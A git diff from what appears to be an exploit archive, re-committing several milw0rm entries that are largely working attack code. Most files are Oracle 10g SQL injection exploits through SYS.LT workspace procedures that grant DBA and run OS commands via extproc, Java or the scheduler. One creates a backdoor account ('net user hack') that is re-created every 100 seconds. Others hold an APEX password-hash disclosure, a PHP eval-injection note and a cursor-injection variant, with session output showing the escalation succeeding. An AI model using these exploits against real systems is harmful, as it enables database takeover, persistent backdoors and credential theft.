($byte_b3 << 16) + ($byte_b2 << 8) + $byte_b1; + printf( "0x%x: 0x%x\n", $address, $val ); + } + $address+=4; +} +?> + +Credit +This vulnerability has been discovered by Hamid Ebadi from Amirkabir University of Technology APA laboratory. +autcert@aut.ac.ir +https://www.ircert.cc + +Disclosure: October 2008 +Report to vendor: December, 10, 2008 + +# milw0rm.com [2009-01-02] diff --git a/platforms/multiple/local/7675.txt b/platforms/multiple/local/7675.txt index 3ff06d3b2..af1b923fd 100755 --- a/platforms/multiple/local/7675.txt +++ b/platforms/multiple/local/7675.txt 
@@ -1,75 +1,75 @@ -/*********************************************************/ -/*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/ -/****grant DBA and create new OS user (advanced extproc)*/ -/*********************************************************/ -/***********exploit grant DBA to scott********************/ -/***********and execute OS command "net user"*************/ -/***********using advanced extproc method*****************/ -/*********************************************************/ -/***********tested on oracle 10.1.0.5.0*******************/ -/*********************************************************/ -/*********************************************************/ -/* Date of Public EXPLOIT: January 6, 2009 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsecrg.ru */ -/* http://www.dsec.ru */ -/*********************************************************/ -/*Original Advisory: */ -/*Esteban Martinez Fayo [Team SHATTER ] */ -/*Date of Public Advisory: November 11, 2008 */ -/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ -/*********************************************************/ - - -select * from user_role_privs; - -CREATE OR REPLACE FUNCTION X return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT CREATE ANY DIRECTORY TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT CREATE ANY LIBRARY TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT EXECUTE ON SYS.DBMS_FILE_TRANSFER TO SCOTT'; -COMMIT; -RETURN 'X'; -END; -/ - -exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); -exec SYS.LT.REMOVEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); - -/* bypassing extproc limitation by copying msvcrt.dll to $ORACLE_HOME\BIN */ -/* this method works in 10g and 11g database versions with updates */ - -CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:\Windows\system32'; -CREATE OR REPLACE DIRECTORY copy_dll_to AS 
'C:\Oracle\product\10.1.0\db_1\BIN'; - -BEGIN - SYS.DBMS_FILE_TRANSFER.COPY_FILE( - source_directory_object => 'copy_dll_from', - source_file_name => 'msvcrt.dll', - destination_directory_object => 'copy_dll_to', - destination_file_name => 'msvcrt.dll'); -END; -/ - -CREATE OR REPLACE LIBRARY extproc_shell AS 'C:\Oracle\product\10.1.0\db_1\bin\msvcrt.dll'; -/ - -CREATE OR REPLACE PROCEDURE extprocexec (cmdstring IN CHAR) -IS EXTERNAL -NAME "system" -LIBRARY extproc_shell -LANGUAGE C; -/ - -/* here we can paste any OS command for example create new user */ - -EXEC extprocexec('net user hack 12345 /add'); -/ - -select * from user_role_privs; - -// milw0rm.com [2009-01-06] +/*********************************************************/ +/*Oracle 10g SYS.LT.REMOVEWORKSPACE SQL Injection Exploit*/ +/****grant DBA and create new OS user (advanced extproc)*/ +/*********************************************************/ +/***********exploit grant DBA to scott********************/ +/***********and execute OS command "net user"*************/ +/***********using advanced extproc method*****************/ +/*********************************************************/ +/***********tested on oracle 10.1.0.5.0*******************/ +/*********************************************************/ +/*********************************************************/ +/* Date of Public EXPLOIT: January 6, 2009 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsecrg.ru */ +/* http://www.dsec.ru */ +/*********************************************************/ +/*Original Advisory: */ +/*Esteban Martinez Fayo [Team SHATTER ] */ +/*Date of Public Advisory: November 11, 2008 */ +/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ +/*********************************************************/ + + +select * from user_role_privs; + +CREATE OR REPLACE FUNCTION X return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN 
+EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT CREATE ANY DIRECTORY TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT CREATE ANY LIBRARY TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT EXECUTE ON SYS.DBMS_FILE_TRANSFER TO SCOTT'; +COMMIT; +RETURN 'X'; +END; +/ + +exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); +exec SYS.LT.REMOVEWORKSPACE('sh2kerr'' and SCOTT.X()=''X'); + +/* bypassing extproc limitation by copying msvcrt.dll to $ORACLE_HOME\BIN */ +/* this method works in 10g and 11g database versions with updates */ + +CREATE OR REPLACE DIRECTORY copy_dll_from AS 'C:\Windows\system32'; +CREATE OR REPLACE DIRECTORY copy_dll_to AS 'C:\Oracle\product\10.1.0\db_1\BIN'; + +BEGIN + SYS.DBMS_FILE_TRANSFER.COPY_FILE( + source_directory_object => 'copy_dll_from', + source_file_name => 'msvcrt.dll', + destination_directory_object => 'copy_dll_to', + destination_file_name => 'msvcrt.dll'); +END; +/ + +CREATE OR REPLACE LIBRARY extproc_shell AS 'C:\Oracle\product\10.1.0\db_1\bin\msvcrt.dll'; +/ + +CREATE OR REPLACE PROCEDURE extprocexec (cmdstring IN CHAR) +IS EXTERNAL +NAME "system" +LIBRARY extproc_shell +LANGUAGE C; +/ + +/* here we can paste any OS command for example create new user */ + +EXEC extprocexec('net user hack 12345 /add'); +/ + +select * from user_role_privs; + +// milw0rm.com [2009-01-06] diff --git a/platforms/multiple/local/7676.txt b/platforms/multiple/local/7676.txt index fc7673f73..ce00d369e 100755 --- a/platforms/multiple/local/7676.txt +++ b/platforms/multiple/local/7676.txt 
@@ -1,70 +1,70 @@ -/*********************************************************/ -/*Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit**/ -/****grant DBA and create new OS user (java)*************/ -/*********************************************************/ -/***********exploit grant DBA to scott********************/ -/***********and execute OS command "net user"*************/ -/***********using java procedures ************************/ -/*********************************************************/ -/***********tested on oracle 10.1.0.5.0*******************/ -/*********************************************************/ -/*********************************************************/ -/* Date of Public EXPLOIT: January 6, 2009 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsecrg.ru */ -/* http://www.dsec.ru */ -/*********************************************************/ -/*Original Advisory: */ -/*Esteban Martinez Fayo [Team SHATTER ] */ -/*Date of Public Advisory: November 11, 2008 */ -/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ -/*********************************************************/ - -select * from user_role_privs; - -CREATE OR REPLACE FUNCTION Y return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; -COMMIT; -RETURN 'Y'; -END; -/ - -exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); -exec SYS.LT.MERGEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); - - - -/* Creating simple java procedure that executes OS */ - -exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<>','execute'); -exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); -exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); - -CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS -import java.lang.*; -import java.io.*; 
-public class JAVACMD -{ - public static void execCommand (String command) throws IOException - { - Runtime.getRuntime().exec(command); - } -}; -/ - -CREATE OR REPLACE PROCEDURE JAVAEXEC (p_command IN VARCHAR2) -AS LANGUAGE JAVA -NAME 'JAVACMD.execCommand (java.lang.String)'; -/ - -/* here we can paste any OS command for example create new user */ - -exec javaexec(‘net user hack 12345 /add’); - -select * from user_role_privs; - -// milw0rm.com [2009-01-06] +/*********************************************************/ +/*Oracle 10g SYS.LT.MERGEWORKSPACE SQL Injection Exploit**/ +/****grant DBA and create new OS user (java)*************/ +/*********************************************************/ +/***********exploit grant DBA to scott********************/ +/***********and execute OS command "net user"*************/ +/***********using java procedures ************************/ +/*********************************************************/ +/***********tested on oracle 10.1.0.5.0*******************/ +/*********************************************************/ +/*********************************************************/ +/* Date of Public EXPLOIT: January 6, 2009 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsecrg.ru */ +/* http://www.dsec.ru */ +/*********************************************************/ +/*Original Advisory: */ +/*Esteban Martinez Fayo [Team SHATTER ] */ +/*Date of Public Advisory: November 11, 2008 */ +/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ +/*********************************************************/ + +select * from user_role_privs; + +CREATE OR REPLACE FUNCTION Y return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; +COMMIT; +RETURN 'Y'; +END; +/ + +exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); +exec SYS.LT.MERGEWORKSPACE('sh2kerr'' and SCOTT.Y()=''Y'); + + + +/* Creating simple 
java procedure that executes OS */ + +exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<>','execute'); +exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); +exec dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); + +CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS +import java.lang.*; +import java.io.*; +public class JAVACMD +{ + public static void execCommand (String command) throws IOException + { + Runtime.getRuntime().exec(command); + } +}; +/ + +CREATE OR REPLACE PROCEDURE JAVAEXEC (p_command IN VARCHAR2) +AS LANGUAGE JAVA +NAME 'JAVACMD.execCommand (java.lang.String)'; +/ + +/* here we can paste any OS command for example create new user */ + +exec javaexec(‘net user hack 12345 /add’); + +select * from user_role_privs; + +// milw0rm.com [2009-01-06] diff --git a/platforms/multiple/local/7677.txt b/platforms/multiple/local/7677.txt index dc0a0d605..e202373a4 100755 --- a/platforms/multiple/local/7677.txt +++ b/platforms/multiple/local/7677.txt 
@@ -1,132 +1,132 @@ -/*********************************************************/ -/*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/ -/**grant DBA and create new OS user (using scheduller)***/ -/*********************************************************/ -/***********exploit grant DBA to scott********************/ -/***********and execute OS command "net user"*************/ -/***********using scheduler*******************************/ -/*********************************************************/ -/***********tested on oracle 10.1.0.5.0*******************/ -/*********************************************************/ -/*********************************************************/ -/* Date of Public EXPLOIT: January 6, 2009 */ -/* Written by: Alexandr "Sh2kerr" Polyakov */ -/* email: Alexandr.Polyakov@dsec.ru */ -/* site: http://www.dsecrg.ru */ -/* http://www.dsec.ru */ -/*********************************************************/ -/*Original Advisory: */ -/*Esteban Martinez Fayo [Team SHATTER ] */ -/*Date of Public Advisory: November 11, 2008 */ -/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ -/*********************************************************/ - -select * from user_role_privs; - -CREATE OR REPLACE FUNCTION Z return varchar2 -authid current_user as -pragma autonomous_transaction; -BEGIN -EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT'; -EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT'; -COMMIT; -RETURN 'Z'; -END; -/ - -exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z'); -exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z'); - - -/* We create backdored OS user "hack" with password 12345 using External Job's */ -/* Note that in this method new user will be created every 100 seconds */ -/* so if administrator find it and will try to delete it */ -/* user hack will be created again. 
So it is also a simle backdoor */ - -BEGIN - DBMS_SCHEDULER.CREATE_PROGRAM ( - program_name=> 'MyCmd', - program_type=> 'EXECUTABLE', - program_action =>’cmd /c "net user hack 12345 /add"’, - enabled=> TRUE); -END; -/ - -BEGIN -DBMS_SCHEDULER.CREATE_JOB ( - job_name=> 'extjobexec', - program_name=> 'MyCmd', - repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100', - enabled=> TRUE, - comments=> 'create backdoor user every 100 seconds'); -END; -/ - - -/* here we can paste any OS command for example create new user */ - -exec dbms_scheduler.run_job('extjobexec'); -/ - -select * from user_role_privs; - - - - - - - - - - - - - - - ---------------------------------------------------------------------------------- ------------------------------EXAMPLE OF EXPLOITATION ---------------------------- ---------------------------------------------------------------------------------- - - -SQL> select * from user_role_privs; - -USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------- ------------------------------ --- --- --- -OUTLN CONNECT NO YES NO -OUTLN RESOURCE NO YES NO - -SQL> CREATE OR REPLACE FUNCTION X return varchar2 - 2 authid current_user as - 3 pragma autonomous_transaction; - 4 BEGIN - 5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN'; - 6 COMMIT; - 7 RETURN 'x'; - 8 END; - 9 / - -Function created. - - - -SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x') - -PL/SQL procedure successfully completed. - -SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x') - -PL/SQL procedure successfully completed. 
- -SQL> select * from user_role_privs; - -USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------- ------------------------------ --- --- --- -OUTLN CONNECT NO YES NO -OUTLN DBA NO YES NO -OUTLN RESOURCE NO YES NO - -SQL> - -// milw0rm.com [2009-01-06] +/*********************************************************/ +/*Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit**/ +/**grant DBA and create new OS user (using scheduller)***/ +/*********************************************************/ +/***********exploit grant DBA to scott********************/ +/***********and execute OS command "net user"*************/ +/***********using scheduler*******************************/ +/*********************************************************/ +/***********tested on oracle 10.1.0.5.0*******************/ +/*********************************************************/ +/*********************************************************/ +/* Date of Public EXPLOIT: January 6, 2009 */ +/* Written by: Alexandr "Sh2kerr" Polyakov */ +/* email: Alexandr.Polyakov@dsec.ru */ +/* site: http://www.dsecrg.ru */ +/* http://www.dsec.ru */ +/*********************************************************/ +/*Original Advisory: */ +/*Esteban Martinez Fayo [Team SHATTER ] */ +/*Date of Public Advisory: November 11, 2008 */ +/*http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml*/ +/*********************************************************/ + +select * from user_role_privs; + +CREATE OR REPLACE FUNCTION Z return varchar2 +authid current_user as +pragma autonomous_transaction; +BEGIN +EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT CREATE ANY JOB TO SCOTT'; +EXECUTE IMMEDIATE 'GRANT CREATE EXTERNAL JOB SCOTT'; +COMMIT; +RETURN 'Z'; +END; +/ + +exec SYS.LT.CREATEWORKSPACE('sh2kerr'' and SCOTT.Z()=''Z'); +exec SYS.LT.COMPRESSWORKSPACETREE('sh2kerr'' and SCOTT.Z()=''Z'); + + +/* We create backdored OS user "hack" with password 12345 using External Job's */ +/* Note that in 
this method new user will be created every 100 seconds */ +/* so if administrator find it and will try to delete it */ +/* user hack will be created again. So it is also a simle backdoor */ + +BEGIN + DBMS_SCHEDULER.CREATE_PROGRAM ( + program_name=> 'MyCmd', + program_type=> 'EXECUTABLE', + program_action =>’cmd /c "net user hack 12345 /add"’, + enabled=> TRUE); +END; +/ + +BEGIN +DBMS_SCHEDULER.CREATE_JOB ( + job_name=> 'extjobexec', + program_name=> 'MyCmd', + repeat_interval=> 'FREQ=SECONDLY;INTERVAL=100', + enabled=> TRUE, + comments=> 'create backdoor user every 100 seconds'); +END; +/ + + +/* here we can paste any OS command for example create new user */ + +exec dbms_scheduler.run_job('extjobexec'); +/ + +select * from user_role_privs; + + + + + + + + + + + + + + + +--------------------------------------------------------------------------------- +-----------------------------EXAMPLE OF EXPLOITATION ---------------------------- +--------------------------------------------------------------------------------- + + +SQL> select * from user_role_privs; + +USERNAME GRANTED_ROLE ADM DEF OS_ +------------------------------ ------------------------------ --- --- --- +OUTLN CONNECT NO YES NO +OUTLN RESOURCE NO YES NO + +SQL> CREATE OR REPLACE FUNCTION X return varchar2 + 2 authid current_user as + 3 pragma autonomous_transaction; + 4 BEGIN + 5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN'; + 6 COMMIT; + 7 RETURN 'x'; + 8 END; + 9 / + +Function created. + + + +SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x') + +PL/SQL procedure successfully completed. + +SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x') + +PL/SQL procedure successfully completed. + +SQL> select * from user_role_privs; + +USERNAME GRANTED_ROLE ADM DEF OS_ +------------------------------ ------------------------------ --- --- --- +OUTLN CONNECT NO YES NO +OUTLN DBA NO YES NO +OUTLN RESOURCE NO YES NO + +SQL> + +// milw0rm.com [2009-01-06] 
diff --git a/platforms/multiple/local/8456.txt b/platforms/multiple/local/8456.txt
index 8a58dbb20..4961cb841 100755
--- a/platforms/multiple/local/8456.txt
+++ b/platforms/multiple/local/8456.txt
@@ -1,76 +1,76 @@ -Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] - -Name Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] -Systems Affected APEX 3.0 (optional component of 11.1.0.7 installation) -Severity High Risk -Category Password Disclosure -Vendor URL http://www.oracle.com/ -Author Alexander Kornbrust (ak at red-database-security.com) -CVE CVE-2009-0981 -Advisory 14 April 2009 (V 1.00) - - -Details -Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER. -Tested on 11.1.0.7. - -C:\> sqlplus dummy/dummy -Connected to: -Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production -With the Partitioning, OLAP, Data Mining and Real Application Testing options - -SQL> select granted_role from user_role_privs; - -GRANTED_ROLE ------------------------------- -CONNECT - - -SQL> select owner,table_name from all_tables where owner='FLOWS_030000'; - -OWNER TABLE_NAME ------------------------------- ------------------------------ -FLOWS_030000 WWV_FLOW_DUAL100 -FLOWS_030000 WWV_FLOW_LOV_TEMP -FLOWS_030000 WWV_FLOW_TEMP_TABLE - - - -Get a list of all columns containing the string "%PASSWORD%' - -SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%'; - -OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME --------------------------------------------------------------------------------- -FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE -FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED -FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW -FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2 -FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD -FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS -FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES -FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT -FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE - -9 rows selected. 
- - -SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS - -USER_NAME WEB_PASSWORD2 --------------------------------------------------------------------------------- -YURI 141FA790354FB6C72802FDEA86353F31 - -This password hash can be checked using a tool like Repscan. - - -Patch Information -Apply the patches for Oracle CPU April 2009. - - -History -13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] -14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] -14-apr-2009 Advisory published - -# milw0rm.com [2009-04-16] +Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] + +Name Unprivileged DB users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER [CVE-2009-0981] +Systems Affected APEX 3.0 (optional component of 11.1.0.7 installation) +Severity High Risk +Category Password Disclosure +Vendor URL http://www.oracle.com/ +Author Alexander Kornbrust (ak at red-database-security.com) +CVE CVE-2009-0981 +Advisory 14 April 2009 (V 1.00) + + +Details +Unprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER. +Tested on 11.1.0.7. 
+ +C:\> sqlplus dummy/dummy +Connected to: +Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production +With the Partitioning, OLAP, Data Mining and Real Application Testing options + +SQL> select granted_role from user_role_privs; + +GRANTED_ROLE +------------------------------ +CONNECT + + +SQL> select owner,table_name from all_tables where owner='FLOWS_030000'; + +OWNER TABLE_NAME +------------------------------ ------------------------------ +FLOWS_030000 WWV_FLOW_DUAL100 +FLOWS_030000 WWV_FLOW_LOV_TEMP +FLOWS_030000 WWV_FLOW_TEMP_TABLE + + + +Get a list of all columns containing the string "%PASSWORD%' + +SQL> select owner||'.'||table_name||'.'||column_name from all_tab_columns where column_name like '%PASSWORD%' and owner like '%FLOWS_0300%'; + +OWNER||'.'||TABLE_NAME||'.'||COLUMN_NAME +-------------------------------------------------------------------------------- +FLOWS_030000.WWV_FLOW_USERS.CHANGE_PASSWORD_ON_FIRST_USE +FLOWS_030000.WWV_FLOW_USERS.FIRST_PASSWORD_USE_OCCURRED +FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD_RAW +FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD2 +FLOWS_030000.WWV_FLOW_USERS.WEB_PASSWORD +FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_DAYS +FLOWS_030000.WWV_FLOW_USERS.PASSWORD_LIFESPAN_ACCESSES +FLOWS_030000.WWV_FLOW_USERS.PASSWORD_ACCESSES_LEFT +FLOWS_030000.WWV_FLOW_USERS.PASSWORD_DATE + +9 rows selected. + + +SQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS + +USER_NAME WEB_PASSWORD2 +-------------------------------------------------------------------------------- +YURI 141FA790354FB6C72802FDEA86353F31 + +This password hash can be checked using a tool like Repscan. + + +Patch Information +Apply the patches for Oracle CPU April 2009. + + +History +13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] +14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] +14-apr-2009 Advisory published + +# milw0rm.com [2009-04-16] 
diff --git a/platforms/multiple/local/8641.txt b/platforms/multiple/local/8641.txt
index 67d4f6c0e..64a967cd8 100755
--- a/platforms/multiple/local/8641.txt
+++ b/platforms/multiple/local/8641.txt
@@ -1,55 +1,55 @@ -mb_ereg(i)_replace() evaluate replacement string vulnerability - -by ryat#www.80vul.com - -when option parameter set e, matchs not be escaped. - -ex: - - - -phpinfo() will be evaluated. - -mb_ereg_replace() - - if ((replace_len - i) >= 2 && fwd == 1 && - p[0] == '\\' && p[1] >= '0' && p[1] <= '9') { - n = p[1] - '0'; - } - if (n >= 0 && n < regs->num_regs) { - if (regs->beg[n] >= 0 && regs->beg[n] < regs->end[n] && regs->end[n] <= string_len) { - smart_str_appendl(pbuf, string + regs->beg[n], regs->end[n] - regs->beg[n]); -// matchs not be escaped - } - -preg_replace() - - if ('\\' == *walk || '$' == *walk) { - smart_str_appendl(&code, segment, walk - segment); - if (walk_last == '\\') { - code.c[code.len-1] = *walk++; - segment = walk; - walk_last = 0; - continue; - } - segment = walk; - if (preg_get_backref(&walk, &backref)) { - if (backref < count) { - /* Find the corresponding string match and substitute it - in instead of the backref */ - match = subject + offsets[backref<<1]; - match_len = offsets[(backref<<1)+1] - offsets[backref<<1]; - if (match_len) { - esc_match = php_addslashes_ex(match, match_len, &esc_match_len, 0, 1 TSRMLS_CC); -// matchs escaped by addslashes() -... - smart_str_appendl(&code, esc_match, esc_match_len); - -# milw0rm.com [2009-05-07] +mb_ereg(i)_replace() evaluate replacement string vulnerability + +by ryat#www.80vul.com + +when option parameter set e, matchs not be escaped. + +ex: + + + +phpinfo() will be evaluated. 
+ +mb_ereg_replace() + + if ((replace_len - i) >= 2 && fwd == 1 && + p[0] == '\\' && p[1] >= '0' && p[1] <= '9') { + n = p[1] - '0'; + } + if (n >= 0 && n < regs->num_regs) { + if (regs->beg[n] >= 0 && regs->beg[n] < regs->end[n] && regs->end[n] <= string_len) { + smart_str_appendl(pbuf, string + regs->beg[n], regs->end[n] - regs->beg[n]); +// matchs not be escaped + } + +preg_replace() + + if ('\\' == *walk || '$' == *walk) { + smart_str_appendl(&code, segment, walk - segment); + if (walk_last == '\\') { + code.c[code.len-1] = *walk++; + segment = walk; + walk_last = 0; + continue; + } + segment = walk; + if (preg_get_backref(&walk, &backref)) { + if (backref < count) { + /* Find the corresponding string match and substitute it + in instead of the backref */ + match = subject + offsets[backref<<1]; + match_len = offsets[(backref<<1)+1] - offsets[backref<<1]; + if (match_len) { + esc_match = php_addslashes_ex(match, match_len, &esc_match_len, 0, 1 TSRMLS_CC); +// matchs escaped by addslashes() +... + smart_str_appendl(&code, esc_match, esc_match_len); + +# milw0rm.com [2009-05-07] diff --git a/platforms/multiple/local/9072.txt b/platforms/multiple/local/9072.txt index 44e499ab8..6c7ea2511 100755 --- a/platforms/multiple/local/9072.txt +++ b/platforms/multiple/local/9072.txt 
@@ -1,56 +1,56 @@ -This is slightly modified version of: http://milw0rm.com/exploits/7677 -This is based on cursor injection and does not need create function privileges: - -DECLARE -D NUMBER; -BEGIN -D := DBMS_SQL.OPEN_CURSOR; -DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0); -SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); -SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); -end; - -#-----------screen dump---------------------------------------------------# -SQL> select * from user_role_privs; - -USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------- ------------------------------ --- --- --- -SCOTT CONNECT NO YES NO -SCOTT EXECUTE_CATALOG_ROLE NO YES NO -SCOTT RESOURCE NO YES NO - -SQL> DECLARE - 2 D NUMBER; - 3 BEGIN - 4 D := DBMS_SQL.OPEN_CURSOR; - 5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme -diate ''grant dba to scott'';commit;end;',0); - 6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); - 7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); - 8 end; - 9 - 10 - 11 / -DECLARE -* -ERROR at line 1: -ORA-01403: no data found -ORA-06512: at "SYS.LT", line 6118 -ORA-06512: at "SYS.LT", line 6087 -ORA-06512: at line 7 - - -SQL> select * from user_role_privs; - -USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------- ------------------------------ --- --- --- -SCOTT CONNECT NO YES NO -SCOTT DBA NO YES NO -SCOTT EXECUTE_CATALOG_ROLE NO YES NO -SCOTT RESOURCE NO YES NO - - -Sid -www.notsosecure.com - -# milw0rm.com [2009-07-02] +This is slightly modified version of: http://milw0rm.com/exploits/7677 +This is based on cursor injection and does not need create function privileges: + +DECLARE +D NUMBER; +BEGIN +D := DBMS_SQL.OPEN_CURSOR; +DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0); 
+SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); +SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); +end; + +#-----------screen dump---------------------------------------------------# +SQL> select * from user_role_privs; + +USERNAME GRANTED_ROLE ADM DEF OS_ +------------------------------ ------------------------------ --- --- --- +SCOTT CONNECT NO YES NO +SCOTT EXECUTE_CATALOG_ROLE NO YES NO +SCOTT RESOURCE NO YES NO + +SQL> DECLARE + 2 D NUMBER; + 3 BEGIN + 4 D := DBMS_SQL.OPEN_CURSOR; + 5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme +diate ''grant dba to scott'';commit;end;',0); + 6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--'); + 7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--'); + 8 end; + 9 + 10 + 11 / +DECLARE +* +ERROR at line 1: +ORA-01403: no data found +ORA-06512: at "SYS.LT", line 6118 +ORA-06512: at "SYS.LT", line 6087 +ORA-06512: at line 7 + + +SQL> select * from user_role_privs; + +USERNAME GRANTED_ROLE ADM DEF OS_ +------------------------------ ------------------------------ --- --- --- +SCOTT CONNECT NO YES NO +SCOTT DBA NO YES NO +SCOTT EXECUTE_CATALOG_ROLE NO YES NO +SCOTT RESOURCE NO YES NO + + +Sid +www.notsosecure.com + +# milw0rm.com [2009-07-02] diff --git a/platforms/multiple/local/9520.txt b/platforms/multiple/local/9520.txt index ef975b941..8bc791481 100755 --- a/platforms/multiple/local/9520.txt +++ b/platforms/multiple/local/9520.txt 
